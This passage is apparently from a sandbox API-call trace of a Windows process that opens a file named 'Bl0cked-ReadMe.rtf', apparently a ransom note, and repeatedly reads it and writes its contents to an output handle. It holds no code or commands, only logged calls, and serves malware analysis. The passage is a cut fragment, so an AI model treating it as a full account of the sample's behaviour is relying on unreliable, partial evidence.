out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.619] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22efbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22efbc) returned 0x2e0e78 [0130.619] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0130.619] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") 
returned 52 [0130.619] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0130.619] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22dec8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0130.619] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] GetFileType (hFile=0x54) returned 0x1 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22df20 | out: lpFileSizeHigh=0x22df20*=0x0) returned 0x1632 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.619] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.620] GetFileType (hFile=0x4c) returned 0x1 [0130.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.620] GetFileType (hFile=0x4c) returned 0x1 [0130.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.620] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) 
returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] GetFileType (hFile=0x4c) returned 0x1 [0130.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.621] WriteFile (in: 
hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.622] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] GetFileType (hFile=0x4c) returned 0x1 [0130.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.622] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.623] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, 
lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.623] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 
| out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.624] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.624] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0130.624] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.624] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.625] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 
[0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.626] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, 
lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.628] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.628] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType 
(hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] 
